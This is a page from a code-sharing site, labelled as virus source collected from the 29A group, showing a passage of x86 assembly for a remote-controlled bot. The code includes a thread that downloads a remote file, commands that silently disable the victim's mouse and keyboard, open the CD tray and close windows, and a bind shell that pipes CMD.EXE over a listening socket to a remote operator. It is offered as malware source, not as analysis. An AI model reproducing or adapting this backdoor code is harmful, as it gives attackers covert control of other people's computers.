29a-7.020
来自「从29A上收集的病毒源码」· 020 代码 · 共 3,316 行 · 第 1/5 页
020
3,316 行
push ebx
push 2000h
push eax
callb CreateThread
pop ecx
push eax
callb CloseHandle
__err: @retecx1
bot_download_thread proc pascal
arg url:DWORD
local f_handle
local inet_handle
local inet_rsrc
local h_mem
@SEH_SetupFrame <jmp __dl_thread_xception>
call $+5
downdlta: pop ebx
_DT equ <-downdlta[ebx]>
mov esi, url
@endsz
lodsd
mov f_handle, eax
x_push eax, <my cute GodzIIla rox~>
mov ecx, esp
xor eax, eax
push eax
push eax
push eax
push INTERNET_OPEN_TYPE_DIRECT
push ecx
call _InternetOpenA _DT
test eax, eax
jz __err
mov inet_handle, eax
xor eax, eax
push eax
push eax
push eax
push eax
push url
push inet_handle
call _InternetOpenUrlA _DT
xchg eax, ecx
jecxz __err_1
mov inet_rsrc, ecx
mov eax, 64000
call malloc
mov h_mem, eax
__cycle: push edx
mov edx, esp
xor eax, eax
push eax
push eax
push edx
push inet_rsrc
call _InternetQueryDataAvailable _DT
pop ecx
xchg eax, ecx
jecxz __err_2
xchg eax, ecx
cmp ecx, 64000
jbe __read
mov ecx, 64000
__read: push ecx
push esp
push ecx
push h_mem
push inet_rsrc
call _InternetReadFile _DT
pop ecx
xchg eax, ecx
jecxz __err_2
xchg eax, ecx
jecxz __err_2
push ecx
mov eax, esp
push 0
push eax
push ecx
push h_mem
push f_handle
call _WriteFile _DT
pop ecx
xchg eax, ecx
jecxnz __cycle
__err_2: mov eax, h_mem
call free
push inet_rsrc
call _InternetCloseHandle _DT
__err_1: push inet_handle
call _InternetCloseHandle _DT
__err:
push f_handle
call _CloseHandle _DT
mov eax, url
call free
leave
__dl_thread_xception: @SEH_RemoveFrame
push 0
call _ExitThread _DT
bot_download_thread endp
bot_cmd_killmouse: call check_logged_in
jnc err_not_logged_in
x_push eax, <rundll32.exe mouse,disable~>
mov eax, esp
push SW_HIDE
push eax
callb WinExec
x_pop
@retecx1
bot_cmd_killkeyb: call check_logged_in
jnc err_not_logged_in
x_push eax, <rundll32.exe keyboard,disable~>
mov eax, esp
push SW_HIDE
push eax
callb WinExec
x_pop
@retecx1
bot_cmd_syskill: call check_logged_in
jnc err_not_logged_in
x_push eax, <rundll32.exe user,disableoemlayer~>
mov eax, esp
push SW_HIDE
push eax
callb WinExec
x_pop
@retecx1
bot_cmd_minaw: call check_logged_in
jnc err_not_logged_in
callb GetForegroundWindow
xchg eax, esi
push esi
callb IsIconic
test eax, eax
jnz __minimyzed
push esi
callb CloseWindow
__minimyzed: @retecx1
bot_cmd_closecd: call check_logged_in
jnc err_not_logged_in
x_push eax, <set CDAudio door closed~>
mov ecx, esp
xor eax, eax
push eax eax eax ecx
callb mciSendStringA
x_pop
@retecx1
bot_cmd_opencd: call check_logged_in
jnc err_not_logged_in
x_push eax, <set CDAudio door open~>
mov ecx, esp
xor eax, eax
push eax eax eax ecx
callb mciSendStringA
x_pop
@retecx1
bot_cmd_closeaw: call check_logged_in
jnc err_not_logged_in
callb GetForegroundWindow
xchg eax, esi
xor eax, eax
push eax
push eax
push WM_QUIT
push esi
callb PostMessageA
@retecx1
bot_cmd_beep: call check_logged_in
jnc err_not_logged_in
lea esi, [ebx+5+1]
cmp byte ptr [esi], LF
jz err_cmd_syntax
call patchcr
call ascii2num
xchg eax, ecx
jecxz __end
__1: push ecx
push -1
callb MessageBeep
pop ecx
loop __1
__end: inc ecx
ret
bot_cmd_cleanclip: call check_logged_in
jnc err_not_logged_in
callb GetOpenClipboardWindow
push eax
callb OpenClipboard
callb EmptyClipboard
callb CloseClipboard
@retecx1
; ---------------------------------------------------------------------------
; displays sytem modal Message Box with given title and message
; format: !msgbox "<msg>" "<title>"
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_msgbox: call check_logged_in
jnc err_not_logged_in
lea esi, [ebx+7+1]
cmp byte ptr [esi], LF
jz err_cmd_syntax
cmp byte ptr [esi], '"'
jnz err_cmd_syntax
inc esi
push esi
@endcr
and byte ptr [esi-1], 0
cmp byte ptr [esi-2], '"'
jnz __err
and byte ptr [esi-2], 0
sub esi, [esp]
mov ecx, esi
mov edx, ecx
mov edi, [esp]
mov al, '"'
repnz scasb
pop esi
jnz err_cmd_syntax
and byte ptr [edi-1], 0
cmp word ptr [edi], '" '
jnz err_cmd_syntax
inc edi
inc edi
push MB_SYSTEMMODAL
push esi
push edi
push 0
callb MessageBoxA
jmp __end
__err: pop eax
jmp err_cmd_syntax
__end: @retecx1
; ---------------------------------------------------------------------------
; spawns a shell on specified port
; format: spawn <port>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_spawn: call check_logged_in
jnc err_not_logged_in
lea esi, [ebx+6+1]
cmp byte ptr [esi], LF
jz err_cmd_syntax
call patchcr
call ascii2num
xchg eax, ecx
jecxz __err
xor eax, eax
push eax
push esp
push eax
push ecx ; thread param
lea ebx, bot_shell_thread X
push ebx
push 2000h
push eax
callb CreateThread
pop edx
push eax
callb CloseHandle
__err: @retecx1
bot_shell_thread proc pascal
arg shell_port:DWORD
local arg_end
local wsocket
local lsocket
local processinfo:PROCESS_INFORMATION
local buffer:byte:512
local read_handle_1
local write_handle_1
local read_handle_2
local write_handle_2
local arg_start
@SEH_SetupFrame <jmp __end_bot_shell>
lea edi, arg_start
lea ecx, arg_end
sub ecx, edi
xor eax, eax
cld
rep stosb
lea edi, buffer
xchg eax, ebx
call $+5
dshell: pop esi
sh equ <-dshell[esi]>
lea eax, write_handle_1
lea ecx, read_handle_1
call __create_pipe
jecxz __end
lea eax, write_handle_2
lea ecx, read_handle_2
call __create_pipe
jecxz __end
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call _socket sh
mov lsocket, eax
inc eax
jz __end_bot_shell
push 1
mov ecx, esp ; alloc optval ptr
push 4
push ecx
push SO_REUSEADDR
push SOL_SOCKET
push lsocket
call _setsockopt sh
pop ecx ; free optval
test eax, eax
jnz __end_bot_shell
push 512
push edi ; buffer
call _gethostname sh
test eax, eax
jnz __end_bot_shell
push edi
call _gethostbyname sh
test eax, eax
jnz __1
__end: jmp __end_bot_shell
__1: mov eax, [eax.h_list]
mov eax, [eax]
push ebx ; alloc sockaddr
push ebx
push dword ptr [eax]
push shell_port
call _htons sh
shl eax, 16
add al, AF_INET
push eax
mov ecx, esp
push type sockaddr_in
push ecx
push lsocket
call _bind sh
add esp, 16
test eax, eax
jnz __end_bot_shell
push 1
push lsocket
call _listen sh
test eax, eax
jnz __end_bot_shell
push ebx
push ebx
push lsocket
call _accept sh
mov wsocket, eax
inc eax
jz __end_bot_shell
; alloc STARTUPINFO
push write_handle_2 ; hStdError
push write_handle_2 ; hStdOutput
push read_handle_1 ; hStdInput
push ebx ; SW_HIDE
push ebx
push STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
push 10
pop ecx
push ebx
loop $-1
push 68
mov edx, esp
mov ecx, cs
xor cl, cl
jecxz __a
x_push ecx, COMMAND.COM~
jmp __b
__a: x_push ecx, CMD.EXE~
__b: mov ecx, esp
lea eax, processinfo
push eax
push edx
push ebx
push ebx
xchg eax, ecx
mov ecx, cs
xor cl, cl
jecxz __c
push CREATE_NEW_CONSOLE
jmp __d
__c: push ebx
__d: xchg eax, ecx
push 1
push ebx
push ebx
push ecx
push ebx
call _CreateProcessA sh
add esp, _xsize + 68 ; free
test eax, eax
jz __end
pump_bot_shell: push ebx
push esp
push processinfo.PI_hProcess
call _GetExitCodeProcess sh
test eax, eax
pop eax
jz __end
cmp ax, STILL_ACTIVE
jnz __end_bot_shell
push ebx
mov ecx, esp
push ebx
push ecx
push ebx
push ebx
push ebx
push read_handle_2
call _PeekNamedPipe sh
pop ecx
test eax, eax
jz __end_bot_shell
jecxz citaj_shell_socket
mov eax, 512
cmp ecx, eax
jbe __overflow
xchg eax, ecx
__overflow: push ebx
mov edx, esp
push ebx
push edx
push ecx
push edi
push read_handle_2
call _ReadFile sh
test eax, eax
pop eax
jz __end_bot_shell
push ebx
push eax
push edi
push wsocket
call _send sh
inc eax
jz __end_bot_shell
jmp pump_bot_shell
citaj_shell_socket: push wsocket
push 1
mov eax, esp
push 0
push 50
mov ecx, esp
xor ebx, ebx
push ecx
push ebx
push ebx
push eax
push 1
call _select sh
inc eax
jz __end_bot_shell
dec eax
jz pump_bot_shell
push ebx
push 512
push edi
push wsocket
call _recv sh
inc eax
jz __end_bot_shell
dec eax
jz __end_bot_shell
push ebx
push esp
push eax
push edi
push write_handle_1
call _WriteFile sh
test eax, eax
jnz pump_bot_shell
__end_bot_shell: @SEH_RemoveFrame
push wsocket
call _closesocket sh
push lsocket
call _closesocket sh
push processinfo.PI_hProcess
call _TerminateThread sh
push write_handle_2
call _CloseHandle sh
push write_handle_1
call _CloseHandle sh
push read_handle_2
call _CloseHandle sh
push read_handle_1
call _CloseHandle sh
push processinfo.PI_hProcess
call _CloseHandle sh
push processinfo.PI_hThread
call _CloseHandle sh
leave
push 0
call _ExitThread sh
__create_pipe: push 1 ; alloc SECURITY_ATTRIBUTES
push ebx
push 12
mov edx, esp
push ebx
push edx
push eax
push ecx
call _CreatePipe sh
add esp, 3*4 ; free SECURITY_ATTRIBUTES
xchg eax, ecx
retn
bot_shell_thread endp
; ---------------------------------------------------------------------------
; copies specified file
; format: !copy <src> <dest>
; i: nothing
;
; o: error ? ecx=0 : ecx!=0
; ---------------------------------------------------------------------------
bot_cmd_copy: call check_logged_in
jnc err_not_logged_in
lea esi, [ebx+5+1]
cmp byte ptr [esi], LF
jz err_cmd_syntax
push esi
@endcr
and byte ptr [esi-1], 0
sub esi, [esp]
mov ecx, esi
mov edi, [esp]
mov al, ' '
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?